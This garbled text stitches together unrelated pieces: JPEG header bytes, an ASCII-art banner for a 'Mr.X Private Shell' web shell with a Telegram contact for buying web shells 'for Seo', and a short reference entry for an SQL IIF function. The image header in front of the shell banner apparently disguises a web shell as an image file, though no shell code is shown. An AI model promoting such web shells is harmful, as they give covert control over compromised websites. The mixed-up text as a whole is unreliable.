����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
--------------------
IIF builtin function
--------------------
Function:
Return a value of the first sub-expression if the given search condition
evaluates to TRUE, otherwise return a value of the second sub-expression.
Author:
Oleg Loa <loa@mail.ru>
Format:
IIF ( <search condition>, <value expression>, <value expression> )
Syntax Rule(s):
IIF (SC, V1, V2) is equivalent to the following <case specification>:
CASE WHEN SC THEN V1 ELSE V2 END
Example(s):
SELECT IIF(VAL > 0, VAL, -VAL) FROM OPERATION